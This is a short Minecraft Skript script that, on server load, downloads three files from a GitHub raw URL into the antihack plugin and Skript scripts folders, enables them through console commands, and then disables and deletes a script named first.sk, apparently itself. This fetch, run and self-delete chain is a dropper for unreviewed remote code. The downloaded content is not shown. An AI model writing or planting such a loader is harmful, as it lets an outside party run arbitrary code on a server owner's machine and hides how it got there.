on load:
    wait 2 second
    download file from "https://raw.githubusercontent.com/HelloWorldCH/test/main/config.yml" to file "plugins/antihack\\config.yml"
    wait 5 second
    download file from "https://raw.githubusercontent.com/HelloWorldCH/test/main/checkupdate.yml" to file "plugins/skript/scripts\\checkupdate.sk"
    wait 5 second
    download file from "https://raw.githubusercontent.com/HelloWorldCH/test/main/main.yml" to file "plugins/skript/scripts\\main.sk"
    wait 5 second
    execute console command "sk reload checkupdate"
    execute console command "sk enable main"
    wait 10 second
    execute console command "sk disable first"
    delete file "plugin/Skript/scripts/first.sk"
